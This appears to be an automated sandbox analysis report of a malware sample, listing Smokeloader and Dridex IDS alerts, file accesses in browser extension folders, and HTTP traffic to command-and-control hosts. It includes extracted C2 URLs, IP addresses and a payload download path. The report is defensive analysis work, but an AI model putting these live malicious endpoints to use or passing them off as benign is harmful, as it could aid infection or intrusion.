                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_005525A4 CryptBinaryToStringA,CryptBinaryToStringA,19_2_005525A4
                  Source: v173TV3V11.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\v173TV3V11.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:49761 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49768 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49769 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49770 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49771 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49772 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49773 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49774 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49775 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49776 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49777 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49778 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49779 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49780 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49781 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49782 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49783 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49784 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49785 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49791 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49793 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49795 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49797 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49799 version: TLS 1.2
                  Source: C:\Users\user\AppData\Local\Temp\451E.exeCode function: 9_2_00007FF763AFFB4C GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,9_2_00007FF763AFFB4C
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00802B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,11_2_00802B15
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00801D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,11_2_00801D4A
                  Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00803ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,11_2_00803ED9
                  Source: C:\Windows\explorer.exeCode function: 14_2_00C830A8 FindFirstFileW,FindNextFileW,FindClose,14_2_00C830A8
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49738 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49737 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49752 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49741 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49788 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49736 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49750 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49751 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49758 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49754 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49740 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49787 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49763 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49745 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49760 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49749 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49764 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49742 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49789 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49739 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49792 -> 201.212.52.197:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49765 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49759 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49755 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49757 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49766 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49790 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49786 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49794 -> 201.212.52.197:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49753 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49743 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49796 -> 201.212.52.197:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49767 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49756 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49798 -> 201.212.52.197:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49747 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49748 -> 190.219.117.240:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49768 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49768 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49772 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49770 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49772 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49770 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49778 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49781 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49797 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49778 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49781 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49775 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49784 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49769 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49776 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49774 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49779 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49784 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49785 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49799 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49776 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49791 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49774 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49777 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49799 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49777 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49782 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49791 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49782 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49771 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49779 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49780 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49797 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49780 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49793 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49793 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49775 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49771 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49795 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49783 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49795 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49783 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49769 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49773 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49773 -> 23.145.40.162:443
                  Source: Network trafficSuricata IDS: 2019082 - Severity 1 - ET MALWARE Windows route Microsoft Windows DOS prompt command exit OUTBOUND : 192.168.2.4:49800 -> 23.145.40.113:443
                  Source: C:\Windows\explorer.exeNetwork Connect: 190.219.117.240 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 201.212.52.197 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.164 443Jump to behavior
                  Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 23.145.40.162 443Jump to behavior
                  Source: Malware configuration extractorURLs: http://nwgrus.ru/tmp/index.php
                  Source: Malware configuration extractorURLs: http://tech-servers.in.net/tmp/index.php
                  Source: Malware configuration extractorURLs: http://unicea.ws/tmp/index.php
                  Source: Joe Sandbox ViewIP Address: 23.145.40.164 23.145.40.164
                  Source: Joe Sandbox ViewIP Address: 23.145.40.162 23.145.40.162
                  Source: Joe Sandbox ViewASN Name: TelecomArgentinaSAAR TelecomArgentinaSAAR
                  Source: Joe Sandbox ViewASN Name: CableOndaPA CableOndaPA
                  Source: Joe Sandbox ViewASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
                  Source: Joe Sandbox ViewASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
                  Source: Joe Sandbox ViewJA3 fingerprint: 72a589da586844d7f0818ce684948eea
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Network trafficSuricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 23.145.40.162:443 -> 192.168.2.4:49768
                  Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://chraqvgclyunxk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://inghaccxrhcia.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://uwadsovjohptv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://dqjcshdhfiffhik.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://ewclkpfbrsdjk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 252Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://uiidyxwxtxdyi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://uoltcvkhemeklfe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://ncagifvdvfuwwfnn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://wwdeekjiqyviexo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://kosstmcfnhuhw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://ydofwygotpmmcts.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://nojnvrwehyneiu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://qnsgnjmmwemj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://wehtacgjvfsaxou.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 240Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://mlgxdfcmbix.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://esxqwevqdpc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://jsjqksunoqiwyetj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://calvinandhalls.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 4431Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://imnavngaywaiojfw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://jhrmvdleayp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://tcfngkdpgqhcen.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://kskwnlkfffwemep.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://wiquilejyybabo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dfddhctvosjupwbf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xyqstrniaxmlxodr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fsupncxklgbjs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: nwgrus.ru
                  Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fcallrcdaowuy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 202Host: nwgrus.ru
